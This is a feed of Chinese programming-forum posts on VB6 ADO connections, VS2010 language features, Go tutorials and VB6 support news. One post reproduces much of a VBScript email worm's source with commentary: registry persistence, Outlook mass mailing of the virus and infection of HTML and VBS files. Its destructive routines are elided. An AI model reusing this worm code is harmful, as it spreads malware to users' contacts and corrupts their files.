好個時候機器也很差,CPU、內存、硬盤等都差得很,跟現在是沒法比了,編程序也沒有現在舒服,還沒有軟驅的時候編程人員用的是穿孔紙帶,機器大的象立柜?赡苡械娜寺犞夹迈r,其實那就是電腦以前的樣子,連游戲都沒有。后來出現了蘋果機和8086以后PC市場才開始火起來,隨著普及量的增多PC的用途也越來越廣,人們開始在上面制作各種用途軟件,這極大推動了電腦語言的發展。產生了匯編語言、C語言Basic語言、數據庫語言等很多風行的語言,它們基本上解決了人們在各行業中的需要。

2、領會語言的特征
每種語言都有它的特征,領會它的特征知道它的優缺點是非常必要的。盲目地選擇一種語言或追求一些風行的語言都不是什么好事。尤其容易把業余程序員給害了,現在很多人就是這樣盲目地學VB或上些速成班,然后再用微軟的控件東拼西湊的編些軟件就以為成了高手了,其實他把編程序的花拳銹腿都學來了,而把最首要的編程底子給漠視了。我在這里忠心地奉勸朋友們,請不要這樣干,要想在這方面有些作為的人最好別在花拳銹腿上浪費青春。

]]>
圖解微軟交互動畫軟件Sparkle主要功能http://www.hufushizhe.com/bbs/dispbbs.asp?BoardID=77&ID=2600&Page=1wangxinxin2010-12-14 14:02:51
以下內容含腳本,或可能導致頁面不正常的代碼
說明:上面顯示的是代碼內容。您可以先檢查過代碼沒問題,或修改之后再運行.
]]>
語言創新 VB 6.0與大型數據庫的無“數據源”連接http://www.hufushizhe.com/bbs/dispbbs.asp?BoardID=77&ID=2599&Page=1wangxinxin2010-12-14 13:59:46數據庫參考書都介紹了ODBC的手工配置方法,或者介紹了如何在代碼中進行ODBC配置。但這兩種方法都有一定的局限性: 不是當程序最終完成并分發到用戶手中后,還需要為用戶配置ODBC,顯得既麻煩又不符合專業軟件的要求;就是得編寫復雜的更改操作系統注冊表文件的程序,十分煩瑣。本文從ADO(ActiveX Data Objects)入手,介紹無需配置數據源的幾種常用大型數據庫連接方法。

本文所述的無“數據源”連接,意義不是不需要數據源,否則連接無從談起,而是不需要配置注冊數據源所進行的連接。ODBC(Open DataBase Connectivity,開放式數據庫連接)是用于連接不同數據源的標準編程語言接口。許多文章中介紹,在實現ODBC時,必須首先配置ODBC環境,進行數據源的注冊,然后才能在對數據庫編程時,對數據源進行連接、訪問和操作,并提供了用PB或VB等語言工具實現數據源注冊的具體方法。這些方法不但復雜煩瑣,而且由于參數內容不一,配置時令人感覺無所適從,不宜把握。

走近ADO

ADO是微軟提供的數據庫訪問技術。它被設計用來同新的數據訪問層OLE DB Provider一起協同工作,以提供通用數據訪問(Universal Data Access)能力。OLE DB是一個底層的數據訪問接口,用它可以訪問各種數據源,包括傳統的關系型數據庫、電子郵件系統及自定義的商業對象等。

ADO提供了一個熟悉的、高層的對OLE DB的Automation封裝接口。對那些熟悉RDO的程序員來說,可以把OLE DB看作ODBC驅動程序,如同RDO對象是ODBC驅動程序接口一樣,ADO對象是OLE DB的接口。同樣,像不同的數據庫系統需要它們自己的ODBC驅動程序一樣,不同的數據源也要求它們自己的OLE DB提供者(OLE DB provider)。目前,雖然OLE DB提供者比較少,但微軟正積極推廣該技術,并計劃用OLE DB取代ODBC。

微軟公司已宣布今后不會對VB SQL/DBLib進行升級,而且ODBC API函數一級的編程方式也不為人們所喜愛,所以,RDO今后將被以ActiveX技術為基礎的ADO所替代。ADO是基于OLE DB之上的技術,它通過內部的屬性和方法提供統一的數據庫訪問接口。

1.ADO組件

● Microsoft ActiveX Data Objects (ADO) :使客戶端應用程序能通過OLE DB提供者訪問和操作數據庫服務器中的數據。

● ActiveX Data Objects Extensions for DDL and Security(ADOX) :將ADO擴展為包括創建、修改和刪除的模式對象,如表格和過程,以及包括用于維護用戶和組以及管理對象權限的安全對象。

● ActiveX Data Objects (Multidimensional) (ADO MD): 將ADO擴展為包括指定到多維數據的對象,并允許瀏覽多維模式、查詢立方和檢索結果。

2.ADO優點

● ADO具有高度的靈活性,它可以使用相同的編程模式連接到不同的數據提供者,而不管給定提供者的特定特性。

● 較低的內存占用率。

● 具有遠程數據服務(RDS)功能,通過RDS可以在一次往返過程中將數據從服務器移動到客戶端應用程序或Web頁,并在客戶端對數據進行處理后將更新結果返回服務器。

● 同傳統的數據對象層次(DAO和RDO)不同,ADO可以獨立創建?梢灾粍摻ㄒ粋“Connection”對象,然后由多個獨立的“Recordset”對象來使用它。

● ODBC本身是以SQL Server、Oracle等關系數據庫作為訪問對象,而OLE DB則不僅限于此,它還可以對電子郵件、文本文件、復合文件、數據表等各種各樣的數據通過統一的接口進行存取。

OLE DB Provider for ODBC是ADO的默認提供者,默認值是MSDASQL,如果省略連接字符串的Provider=參數,ADO將試圖建立與該提供者的連接。

ADO的連接方式主要可分為OLE DB Privder方式與OLE DB Provider for ODBC方式。前者很明顯是微軟公司極力推薦的方式,對于ADO或RDS程序員來說,理想的環境是每個數據源都具有一個OLE DB接口,這比ODBC方式要快且所需資源更少。

ODBC Provider允許ADO連接到任何ODBC數據源。ODBC驅動程序對于當今使用的各種主要DBMS都有效,包括SQL Server、Access、FoxPro,以及諸如Oracle等非微軟數據庫產品。提供者將不受線程控制,允許使用Unicode,并將支持事務。

連接對象屬性

ConnectionString是Connection對象的屬性名稱,為可讀寫String類型,提供數據提供者或服務提供者打開到數據源的連接所需要的特定信息,包括Provider、Driver、Server、Database、DSN、UID、PWD或者Provider、Data Source、User、Password、Initial Catalog等。

1.Provider

字符串表達式,指定OLE DB數據或服務提供者的名稱,可以缺省。

一般有三種提供者:數據提供者、服務提供者和服務組件。數據提供者擁有自己的數據并將數據以表的格式顯示給應用程序。服務提供者將服務封裝,使ADO應用程序中的功能得以擴大。服務提供者也可以進一步定義為服務組件,服務組件必須連同其他服務提供者或組件一起工作。

2.Driver

字符串表達式,表示ODBC驅動程序的名稱,并不是ODBC驅動程序動態鏈接庫(DLL)的文件名。

有些驅動程序是微軟公司的產品,在安裝操作系統時就已經安裝好了; 而有些數據庫產品的驅動程序由開發數據庫產品的軟件公司隨數據庫產品一起提供,需要在安裝數據庫時選擇安裝后,才可以使用。如:Sybase數據庫驅動程序等。

3.Server(SRVR)

字符串表達式,數據庫服務名稱。

4.Database(DB)

字符串表達式,指定服務器上的數據庫名稱。即使DSN定義已經指定了數據庫,也可以在DSN之外指定Database參數以便連接到不同的數據庫。

5.DSN(Data Source)

字符串表達式,在此為空,無須指定連接的ODBC數據源的名稱。

6.UID(User ID)

字符串表達式,為ODBC數據源指定用戶標識(用戶賬號名),指定用戶必須有足夠的權限。

7.PWD(Password)

字符串表達式,為ODBC數據源指定用戶口令,必須有足夠的權限。

8.Persist Security Info

布爾類型,為True時,表明采用集成安全機制;若為False,則表明不采用集成安全機制。

無DSN(非DSN)連接

除了ADO所定義的參數外,提供者不支持任何特定連接參數,它將把任何非ADO連接參數傳遞給ODBC驅動程序管理器。下面介紹幾種常見數據庫的處理方法。

1. Visual Foxpro

[PROVIDER=MSDASQL.1]; ’或者為MSDASQL

DRIVER={Driver Name};

SourceDB=Path;

SourceType=DBF

例如:

cnna.ConnectionString = “PROVIDER=MSDASQL; ”

+ “DRIVER={Microsoft Visual Foxpro Driver};”

+ “SourceDB=D:\data\;”

+ “SourceType=DBF”

2.SQL Server

[PROVIDER=MSDASQL;]

DRIVER={Driver Name};

SERVER=server;

DATABASE=database;

UID=user;

PWD=password

例如:

cnnb.ConnectionString = “PROVIDER=

MSDASQL;”

+ “DRIVER={SQL Server};”

+ “SERVER=servera;”

+ “DATABASE=pubs;”

+ “UID=sa;”

+ “PWD=yyuui”

3. Sybase數據庫

[PROVIDER=MSDASQL;]

DRIVER={Driver Name};

SRVR=server; ’必須是SRVR,不能是SERVER

DB=database; ’可以是DB,也可以是DATABASE

DSN=; ’可以省略

UID=user;

PWD=passwod;

PERSIST SECURITY INFO=False

例如:

cnnc.ConnectionString=

“PROVIDER=MSDASQL;”

+ “DRIVER={Sybase System 11};”

+ “SRVR=serveru; ”

+ “DSN=;”

+ “DB=dataa;”

+ “UID=sa;”

+ “PWD=dqwe;”

+ “PERSIST SECURITY INFO=False”

4. Oracle數據庫

[PROVIDER=MSDASQL;]

DRIVER={Driver Name};

SERVER=server;

databasename=database;

databasefile=path;

DSN=;

UID=user;

PWD=password;

例如:

cnnd.ConnectionString =

“PROVIDER=MSDASQL; ”

+ “DRIVER={Microsoft ODBC for Oracle};”

+ “SERVER=Webserver;”

+ “DSN=;”

+ “databasename=dataall;”

+ “databasefile=d:\data\;”

+ “UID=dba;”

+ “PWD=killer”

應用實例

下面以Sybase 11.9.2為例,編制一個簡單的工作人員管理程序,介紹ADO的具體實現方法和步驟。數據庫名稱為Workerdb,只包括一個表(Worker),其結構如下:

字段名稱    寬度       注釋

code nchar(4) 代號

name char(8) 姓名

…… …… ……

首先安裝ADO,在VB的“工程”/“引用”對話框中選擇“ActiveX Data Object 2. 5 Library”(ADODB)。其中“ADO Recordset 2. 5 Library”是一個客戶端的版本(ADOR),因為不需要Connection對象來建立與遠程數據源的聯系,所以ADOR對于客戶端的數據訪問來說已經足夠了。 下面是部分主要代碼:

1. 處理代碼

’在工程菜單中引用Microsoft ActiveX Data Object 2. 5 Library

’聲明ADO連接對象為工程級全局變量

Public cndbase As New ADODB.Connection

……

’自定義連接數據庫函數

Public Function ConnectDbase(StrConnect As String) As Boolean

On Error GoTo ErrHandle

cndbase.ConnectionString = StrConnect

cndbase.Open

cndbase.CursorLocation = adUseClient

ConnectDbase = True

Exit Function

ErrHandle:

ConnectDbase = False

End Function

Private Sub Form_Load()

……

輸入 VarServer ’服務名稱

VarDbase ’數據庫名稱

VarUser ’用戶名稱

VarPassword ’用戶口令

……

’連接數據庫,采取無DSN連接方法

StrConnect = “Provider=MSDASQL;”

+“Driver={” & VarDriver &“};”

+“SRVR=” & VarServer & “;”

+“DB=” & VarDbase & “;”

+“DSN=;”

+“UID=” & VarUser & “;”

+“PWD=” & VarPassword & “;”

+ “Persist Security Info=False” ’不采用集成安全機制

if ConnectDbase(StrConnect) Then

Exit Sub

else

myexit = MsgBox(“數據庫連接失。≌垯z查連接設置信息。”, vbOKOnly, “錯誤提示:”)

Unload me

endif

ErrHand:

myexit = MsgBox(“錯誤程序:” & Err. Source & Chr(10) & “錯誤代碼:” & Err. Number & Chr(10) & “錯誤信息:” & Err.Description, VbAbortRetryIgnore, “錯誤提示:”)

If myexit = 3 Then

Err.Clear

Unload Me

Else

If myexit = 4 Then

Err.Clear

Resume

Else

Err.Clear

Resume Next

End If

End If

End Sub

Private Sub Form_Unload()

……

cndbase.Close

Set cndbase = Nothing

End Sub

2. 建表

codbase.CommandText=“{call CREATABLE (?) }”

codbase.CommandType = adCmdText

codbase.Name = “CREATABLE”

’設定OutPut的參數

Set param = codbase.CreateParameter(“flag”, adInteger, adParamOutput)

codbase. Parameters. Append param

Set codbase. ActiveConnection = cndbase

codbase. Execute

If codbase. Parameters(0) = 0 Then

myexit = MsgBox(“建表成功!”, vbOKOnly, “程序提示:”)

Else

myexit = MsgBox(“建表失敗!”, vbOKOnly, “錯誤提示:”)

Endif

……

3. 修改

rsdbase. Open“worker”,cndbase,adOpenDynamic,adLockPessimistic,adCmdTable

rsdbase. MoveFirst

cndbase. BeginTrans

’在記錄集中進行循環更改

Do Until rsdbase.EOF

’增加20元職務代碼為1的人員的工資

If rsdbase! duty = 1 Then

rsdbase! salary = rsdbase! salary + 20

End If

rsdbase. MoveNext

Loop

rsdbase.UpdateBatch

……

4. 統計

StrSQL = “Select avg(salary), sum(salary) from worker”

rsdbase. CursorLocation = adUseClient

rsdbase. Open StrSQL,cndbase

salaryavg = rsdbase(0) ’平均工資

salarysum = rsdbase(1) ’工資總和

……

rsdbase .Close

5. 存儲過程creatable. sql

CREATE PROCEDURE dbo.creatable(@return_value integer output)

AS

Begin

Create table Workerdb..Worker

( code nchar(4) not null ,

name char(8) not null ,

year nchar(4) ,

month nchar(2) ,

day nchar(2) ,

salary numeric(18,2) ,

duty nchar(1) )

If @@error != 0

begin

select @return_value = 1

  End

 Else

Begin

select @return_value = 0

End

return

End]]>
微軟 VS2010 中 VB 和 C# 語言的增強http://www.hufushizhe.com/bbs/dispbbs.asp?BoardID=77&ID=2598&Page=1wangxinxin2010-12-14 13:52:57 

選擇一種編程語言是每一個程序員都要做的個人決定。這就好像對冰淇淋口味的選擇一樣。冰淇淋口味的選擇多多,但你最喜歡的口味只關系到你的個人偏好。

在Visual Studio 2010種,為了給程序員提供他們構建出色軟件時所需要的所有工具而不用局限于他們所選擇的語言,我們從好幾個方面增強了我們最流行的兩種語言,Visual Basic和C#語言的功能。

Visual Basic

Visual Basic開發團隊為了讓開發人員可以用更少的代碼完成更多的任務,集中增加了和生產力相關的功能特性。Visual Basic客戶最常提出的要求是在大多數情況下能省去為代碼聲明分成多行時所需要添加的下劃線(“_”)。Visual Basic 10增加了隱式斷行的功能特性,能在大多數情況下不要求開發人員使用下劃線來斷行。

Function Filter(
                    ByVal customers As List ( Of Customer),
                    ByVal orderCount As Integer
                   )
        Dim query =
                    From c In customers
          Where c.Orders.Count >
                orderCount
                    Select c

另一個新添加的和提高生產力有關的功能特性是自動實現屬性。有了自動實現屬性的功能,多行常規的屬性實現的代碼就可以用一行簡單的聲明代替。在加入該功能特性之前,屬性聲明經常如下所示:

Private _FavoriteFlavor As String = "Butter Pecan"
    Property FavoriteFlavor() As String
        Get
            Return _FavoriteFlavor
        End Get
        Set(ByVal value As String)
            _FavoriteFlavor = value
        End Set
    End Property
    Private _FlavorList As New List(Of Flavor)
    Property FlavorList() As List(Of Flavor)
        Get
            Return _FlavorList
        End Get
        Set(ByVal value As String)
            _FlavorList = value
        End Set
    End Property

現在,屬性聲明能用簡單的多得方法實現:

Property FavoriteFlavor As String = "Butter Pecan"
    Property FlavorList As New List(Of Flavor)

集合初始化和數組Literal也變得更加簡單。現在集合能在它們被聲明的時候就被初始化,而數組Literal的類型能交由編譯器來識別。

Dim toppings = New List(OfString) From
        {
         "sprinkles",
         "chocolate chips",
         "strawberries"
        }
    Dim cones = {"sugar cone", "waffle cone"} 'String()的類

型被編譯器識別出來

現在,Visual Basic 10.0有了更好的lambda表達式支持。現在,Lambda表達式可以包含沒有返回值的表達式,就像下面sub關鍵詞所要表達的那樣:

Array.ForEach(toppings, Sub(n) Console.WriteLine(n))

有時候,你會想在Lamdba表達式聲明中作些更復雜的工作。Visual Basic 10.0支持多行的Lamdba表達式。就像在常規Lambda表達式中一樣,編譯器將盡可能識別變量和返回類型。

Dim doubleDown = Function(n AsString)
                         If n.StartsWith("s") Then
                             Return "extra " & n
                         Else
                             Return n
                         End If
                     End Function

在Visual Basic 10.0中,和Python及Ruby語言等動態語言的互通操作也變得更加簡單。比如,下面的代碼片斷調用了一個Python庫“math.ph”中的方法:

Dim mathLib As Object = python.UseFile("math.py")
    Dim firstNumber = 44.2
    Dim secondNumber = 9.5
    mathLib.PowerOf(firstNumber, secondNumber)

C#

C# 4.0主要增強了與動態編程語言的互通性并改進了Office編程性。動態查找是C# 4.0的一個新功能,能讓你用同樣的方法使用和操作IronPython、IronRuby、JScript、HTML DOM以及標準.NET庫中的對象,不管該對象從哪里獲得。命名參數和可選參數,以及對COM客戶端支持的改進等語言方面的增強讓那些和Office API打交道的C#開發人員與Visual Basic開發人員有同樣的美妙體驗。

在你的代碼中加入新的dynamic關鍵詞能讓它的類型在運行時被動態解析而非編譯時的靜態解析。這讓動態語言用一種C#編程員覺得自然的方式在C#語言中暴露他們的對象:

dynamic dynamicObject = GetDynamicObjectFromRuby();
    dynamicObject.Foo(7);
    dynamicObject.Property = "Property value";
    dynamicObject[0] = "Indexed value";

可選方法參數對Visual Basic和C++的編程員來說再熟悉不過,F在C#編程員同樣可以使用這種參數?蛇x參數在方法簽名中與一個默認值一同聲明,如下所示:

private void CreateNewStudent(string name, int 

currentCredits = 0, int year = 1)

上面這個方法可以用下面任意一種方法調用:

CreateNewStudent("Chloe");
    CreateNewStudent("Zoe", 16);
    CreateNewStudent("Joey", 40, 2);

如果要省略currentCredit參數但指明year參數,可以使用新加入的命名參數功能特性(如高亮的代碼所示)。下面所有的調用都是合法的:

CreateNewStudent("Jill", year: 2);
    CreateNewStudent(name:"Bill", currentCredits: 30, year: 

2);
    CreateNewStudent("Will", currentCredits: 4);

即使不用可選參數,命名參數同時也是一種用來對你現有方法編寫自定義調用的好方法。

]]>
Go 語言初級教程http://www.hufushizhe.com/bbs/dispbbs.asp?BoardID=77&ID=2597&Page=1wangxinxin2010-12-14 13:51:521、Go 語言初級教程之一[變量聲明]

2、Go 語言初級教程之二[條件語句]

3、Go 語言初級教程之三[分支語句]

4、Go 語言初級教程之四[循環]

5、Go 語言初級教程之五[函數]

6、Go 語言初級教程之六[基本類型]

7、Go 語言初級教程之七[面向對象]

8、Go 語言初級教程之八[并發]

9、Go 語言初級教程之九[包]]>
VB6用戶聯名上書微軟 反對其停止技術支持http://www.hufushizhe.com/bbs/dispbbs.asp?BoardID=77&ID=2596&Page=1wangxinxin2010-12-14 13:47:16  這些用戶都是微軟最具價值專業項目(MVPs Most Valuable Professional program)的成員,他們稱微軟停止支持無疑于毀滅成百上千萬的Visual Basic 6 (VB6)應用軟件,拋棄了編程人員,因為他們并沒有經過新語音的培訓。

  微軟此前表示,將于本月底停止對Visual Basic 6提供標準支持,終止免費的突發事件支持和升級,這兩項服務改為收費服務再延續三年。

  MVPs不僅僅要求微軟繼續對VB6提供支持,并開發與新產品Visual Basic.Net接軌的語言。

  聯名申請書表示,“在Visual Studio IDE框架內提供新版基于COM的Visual Basic有助于微軟保持客戶已開發程序產品的價值,也可以顯示微軟致力于核心Visual Basic語言的決心,并能夠大大簡化VB.NET 推廣的過程!

  心懷不滿的開發者稱,微軟用Visual Basic.Net (或Visual Basic 7)來代替VB6,事實上是從根本上拋棄一種語言而選擇完全不同的另一種語言。要讓基于VB6的應用軟件升級到VB.Net幾乎是不可能的,而對于VB6開發者來說學習VB.Net語言無疑于學習另一種完全陌生的復雜語言,VB.Net只在名義上屬于Visual Basic。

  聯名書表示,微軟在開發 C#語言的同時還在開發C++語言,為何在Visual Basic和VB.Net語言開發上不采用同樣的模式呢?微軟于2000年推出VB.Net后,VB6及老版本用戶大量遞減,他們并沒有轉向VB.Net,而是Java等非微軟產品。

  在北美地區,絕大多數Visual Basic開發者繼續使用VB6或更老的版本,使用VB6的開發者占45%,而使用VB.Net用戶只占34%。

  一些業界觀察人士認為,盡管開發用戶的請求可能起一定作用,但并無實際意義,因為微軟不大可能改變對于VB6的立場。

]]>
通過對一個病毒源碼的分析,了解VBS腳本語言的應用-.net教程,VB.net語言http://www.hufushizhe.com/bbs/dispbbs.asp?BoardID=77&ID=2595&Page=1wangxinxin2010-12-14 13:45:43讀了《將vbscript拒之“窗”外》一文,心里有些感觸,覺得是不
是少了兩個字,應為《將vbscript病毒拒之“窗”外》,vbscript何罪之有,看了
看文章,確實是將vbscript拒之了“窗”外,上網查了查相關資料,也多是文中提
供的方法,vbscript可真成了冤大頭,可謂是“擋住了蒼蠅,也看不到了蝴蝶”。
  對于一個真正充滿熱情的cfan來說,不僅要知其然,還要知其所以然,vbs病毒
真的很可怕嗎?從早期的宏病毒,到有名的“歡樂時光”病毒,“愛情蟲”病毒等,
無不來勢洶洶,其實許多生勢多是殺毒軟件商的炒做,讀了前文,筆者覺得有必要
為vbs正名,為了讓計算機更好,更高效的服務,我們決不應該回避優秀的軟件工具,
采取被動回避的策略,等同于因噎廢食。
    本文通過對一個vbs病毒源碼的分析,介紹腳本語言在:文件系統,注冊表,以
及網絡郵件三個方面的具體應用和技巧。較早的“愛情蟲”等病毒,程序比較粗糙,
這個病毒結合了許多早期病毒的優點,程序代碼簡單,高效,充分展示了vbs的全面
特點,因此拿來與大家共享,如果將這個源碼作為一個vbs開發的微型幫助文檔,一
點不為過。讀者也可以通過此文揭開此類病毒的神秘面紗,不再談虎色變,先進的東
西都不敢用了。殺病毒嗎,筆者還是建議您購買一套殺毒軟件(幾十元的價格,一點
不貴),然后注意更新病毒庫就可以了。要學習 vbs,具有一些vb的基礎知識就夠了。
這個病毒的主要攻擊方法是:通過網絡及郵件進行傳播,并且不斷地向目標郵件服
務器發送大量郵件,并且在傳染過程中檢測網絡主機的名稱中是否有目標字符,如
果有則進行破壞攻擊。
下面將結合具體的程序逐步進行介紹,由于篇幅關系,對一些語句進行了縮減。
@ thank you!  make use of other person to get rid of an enemy, white trap _2001
開場白,第一個字符“@”是這個病毒傳染時的標記
on error resume next  這一句很重要,主要是在程序執行時如果發生錯誤就接著
                      執行下一條語句,防止談出出錯對話框,否則就不能偷偷
                      的干壞事啦。這里有一個技巧,就是在程序編制調試階段,
                      最好不要這一條語句,因為它會忽略錯誤,使你的調試工
                      作不易完成。
dim vbscr, fso,w1,w2,mswkey,hcuw,code_str, vbs_str, js_str
dim defpath, smailc, max_size, whb(), title(10)      聲明各個變量
smailc = 4
redim whb(smailc)
whb(0) = "pr@witehous.gov"
...
whb(3) = "ms@witehous.gov"
以上這四個郵件地址就是被攻擊的目標,當然已經進行了修改,不是真實地址
title(0) = "thanks for helping me!"
...
title(8) = "the sitting is open!"
title(9) = ""
以上這十條字符串是病毒執行時隨機顯示在ie標題欄里的信息。如果你的ie標題欄
顯示了其中的某條信息,呵呵,一定要接著往下看
defpath  = "c:\readme.html"          將隨郵件一起發送的病毒體
max_size = 100000
mswkey  = "hkey_local_machine\software\microsoft\windows\"
hcuw    = "hkey_current_user\software\microsoft\wab\"
定義兩個注冊表的鍵值變量
main    執行主函數

下面就是程序中所需的各個函數的定義部分,整個vbs程序將由windows目錄中的
wscript.exe文件解釋執行,如果將這個文件改名或刪除,當然vbs程序也就不能執行
了,如此便阻止了病毒的執行。在用殺毒軟件殺毒時,往往病毒傳播的速度要比殺
毒的速度快,如果出現這種情況,應該先將wscript.exe文件改名,阻止病毒傳播,
等殺完毒后,再改回來,不致影響其他正常的vbs程序的執行。
sub main()
on error resume next
dim w_s
w_s= wscript.scriptfullname    得到此文件名稱
if w_s = "" then
err.clear
set fso = createobject("scripting.filesystemobject")
隨著vb編程語言的完善,微軟也推出了一種全新的文件操作方法:文件系
        統對象(filesystemobject)。這個對象,及一些相關對象,封裝了所有
        的文件操作。這個病毒程序基本展示了所有的這些操作,因此,如果您要
        利用vbs進行文件操作編程,將這個病毒源碼作為參考文檔,肯定不錯。
if geterr then
  randomize
  ra = int(rnd() * 7)
  doucment.write title(ra)     
  executemail        打開有毒的頁面
else     
  executepage        賦值成功,進行傳染,攻擊
end if 
else
executevbs                  從病毒體文件“system.dll”提取病毒
end if
end sub

function  geterr()
本函數主要是檢測前一條語句是否成功返回了scripting.filesystemobject對象,
內容略
end function

sub executepage()
dim html_str,adi,vf,wdf, wdf2,wdf3,wdsf, wdsf2
vbs_str  = getscriptcode("vbscript")      獲得此程序的vbscript code
js_str  = getjavascript()
code_str =  makescript(encrypt(vbs_str),true)  進行加密處理
html_str =  makehtml(encrypt(vbs_str), true)
gf
wdsf  = w2 & "mdm.vbs"
wdsf2 = w1 & "profile.vbs"
wdf  = w2 & "user.dll"
wdf2  = w2 & "readme.html"
wdf3  = w2 & "system.dll"

set vf = fso.opentextfile (wdf, 2, true)
vf.write vbs_str
vf.close 
僅用以上三條語句便完成了病毒體文件 "user.dll"的制作,其中對象函數
opentextfile (wdf, 2, true)的三個參數分別是:
①文件名,②讀=1或寫=2,③文件不存在時是否創建;
當前,filesystemobject對于文本文件的操作有較強的優勢,對binary文件
的操作還有待加強。下面依次生成其他的文件,內容略

writereg  mswkey & "currentversion\run\mdm", wdsf, ""   
writereg  mswkey & "currentversion\runservices\profile", wdsf2, ""
將mdm.vbs,profile.vbs兩個腳本文件加入到啟動組當中,隨win啟動自動執行
sendmail
hackpage
if testuser then
killhe
else
mk75
end if
set adi = fso.drives        所有驅動器對象
for each x in adi          遍歷所有的驅動器
if x.drivestype = 2 or x.drivestype = 3 then 
  call searchhtml(x & "\")
end if
next
if fso.fileexists(defpath) then  fso.deletefile defpath
如果存在"c:\readme.html" ,就刪除它
end sub

sub  executemail()
此函數制作病毒文件"c:\readme.html" ,并打開它,
由這一段程序,可以看出vbs的簡潔高效
on error resume next
vbs_str  = getscriptcode("vbscript")
js_str  = getjavascript()
set stl = createobject("scriptlet.typelib")
with stl
.reset
.path = defpath
.doc =  makehtml(encrypt(vbs_str), true)
.write()
end with
window.open defpath, "trap", "width=1 height=1 menubar=no scrollbars=no toolbar=no"
end sub

sub executevbs()
on error resume next
dim x, adi, wvbs, ws, vf
set fso = createobject("scripting.filesystemobject")
set wvbs = createobject("wscript.shell")
gf
wvbs.regwrite  mswkey & "windows scripting host\setings\timeout", 0, "reg_dword"
set vf = fso.opentextfile (w2 & "system.dll", 1)
code_str = vf.readall()
vf.close
hackpage
sendmail
if testuser then
killhe
else
mk75
end if
set adi = fso.drives
for each x in adi
if x.drivestype = 2 or x.drivestype = 3 then 
  call searchhtml(x & "\")
end if 
next
end sub

sub gf()
w1=fso.getspecialfolder(0) & "\"  獲得windows的路徑名,
w2=fso.getspecialfolder(1) & "\"  獲得系統文件夾路徑名
end sub

function readreg(key_str)
set tmps = createobject("wscript.shell")
readreg = tmps.regread(key_str)
set tmps = nothing
end function

function writereg(key_str, newvalue, vtype)
對注冊表進行寫入操作,讀操作類似,可以由此看到vbs的注冊表操作非常簡單明了。
set tmps = createobject("wscript.shell")
if vtype="" then
tmps.regwrite key_str, newvalue
else
tmps.regwrite key_str, newvalue, vtype
end if     
set tmps = nothing      關閉不用的資源,算是病毒的良好行為
end function

function makehtml(sbuffer, ihtml)
制作html文件的內容
dim ra
randomize
ra = int(rnd() * 7)
makehtml="<" & "html><" & "head><" & "title>" & title(ra) & "</" & "title><" & "/head>" & _
"<bo" & "ad>" & vbcrlf &  makescript(sbuffer, ihtml) & vbcrlf & _
"<" & "/boad><" & "/html>"
end function

function makescript(codestr, ihtml)
制作病毒的可執行script code
if ihtml then
dim docuwrite
docuwrite = "document.write(<+" & "script language=javascript>\n+" & _
      "jword" & "+\n</" & "+script>);"
docuwrite = docuwrite & vbcrlf & "document.write(<+" & "script language=vbscript>\n+" & _
      "nword" & "+\n</" & "+script>);"
makescript="<" & "script language=javascript>" & vbcrlf & "var jword = " & _
chr(34) & encrypt(js_str) & chr(34) & vbcrlf & "var nword = " & _
chr(34) &  codestr &  chr(34) & vbcrlf & "nword = unescape(nword);" & vbcrlf & _
"jword = unescape(jword);" & vbcrlf & docuwrite & vbcrlf & "</" & "script>"
else   
makescript= "<" & "script language=javascript>" & codestr & "</" & "script>"
end if
end function

function getscriptcode(languages)
此函數獲得運行時的script code,
內容略
end function

function getjavascript()
getjavascript = getscriptcode("javascript")
end function

function testuser()
此函數通過鍵值檢測網絡主機是否是攻擊目標
內容略
end function

function mk75()
檢測日期是否符合,如果符合,發控制臺命令,使系統癱瘓
end function

function sendmail()
利用outlook發送攜帶病毒體的郵件,microsoft outlook是可編程桌面信息管理程序,
outlook可以作為一個自動化服務器(automation servers),因此很容易實現自動發送
郵件,從這里也可以看出,先進的東西難免會被反面利用,如果你也想用程序控制發送
郵件,可以仔細研究下面的代碼,
on error resume next
dim wab,ra,j, oa, arrsm, eins, eaec, fm, wreg, areg,at
randomize
at=fso.getspecialfolder(1) & "\readme.html"    要發送的附件文件
set  oa  = createobject("outlook.application") 制作outlook對象
set  wab = oa.getnamespace("mapi")            取得outlook mapi名字空間
for j = 1 to wab.addresslists.count            遍歷所有聯系人
eins = wab.addresslists(j)
wreg=readreg (hcuw  & eins)
if (wreg="") then wreg = 1
eaec = eins.addressentries.count      地址表的email記錄數
if (eaec > int(wreg)) then
  for x = 1 to eaec
  arrsm = wab.addressentries(x)
  areg = readreg(hcuw & arrsm)
  讀注冊表中的標記,避免重復發送
  if (areg = "") then
    set fm = wab.createitem(0)  創建新郵件
    with fm
    ra = int(rnd() * 7)
    .recipients.add arrsm 收件人
    .subject = title(ra) 郵件的標題
    .body = title(ra)  郵件的正文內容
    .attachments at  病毒文件作為附件
    .send        發送郵件
    writereg hcuw & arrsm, 1, "reg_dword"
    end with
  end if
  next
end if   
writereg hcuw & eins, eaec, "" 
next
set oa = nothing
window.settimeout "sendmail()", 10000  每100秒發送一次
end function

sub searchhtml(path)
這個函數遞歸搜索所有需感染的文件,如果你想批量處理文件,這是非常典型
的樣例代碼
on error resume next
dim pfo, psfo, pf, ps, pfi, ext
if instr(path, fso.getspecialfolder(2)) > 0  then exit sub
fso.getspecialfolder(2)獲得臨時文件夾路徑名,
fso.getspecialfolder(0)獲得windows的路徑名,
fso.getspecialfolder(1)獲得系統文件夾路徑名
set pfo    = fso.getfolder(path)
set psfo  = pfo.subfolders
for each  ps in psfo
searchhtml(ps.path)
set pf  = ps.files
for each pfi in pf
  ext = lcase(fso.getextensionname(pfi.path))
  if instr(ext, "htm") > 0 or ext = "plg" or ext = "asp" then
  if code_str<>"" then addhead pfi.path, pfi, 1
  elseif ext= "vbs"  then
  addhead pfi.path,pfi, 2
  end if     
next
next
end sub

sub killhe()
看函數名就知道硬盤又要倒霉啦
end sub

sub hackpage()
dim fi

]]>
VB真是想不到系列之二:VB《葵花寶典》--指針技http://www.hufushizhe.com/bbs/dispbbs.asp?BoardID=77&ID=2594&Page=1wangxinxin2010-12-14 12:35:56《VB真是想不到系列》
    每次看大師的東西到了精彩之處,我就會拍案叫絕:"哇噻,真是想不到!"。在經過很多次這種感慨之后,我發現只要我們動了腦筋,我們自己也能有讓別人想不到的東西。于是想到要把這些想不到的東拿出來和大家一起分享,希望拋磚引玉,能引出更多讓人想不到的東西。
   
                  VB真是想不到系列之二:VB《葵花寶典》--指針技術
關鍵字:VB、指針、動態內存分配、效率、安全
難度:中級至高級
要求:熟悉VB,掌握基本的C,了解匯編,了解內存分配原理。
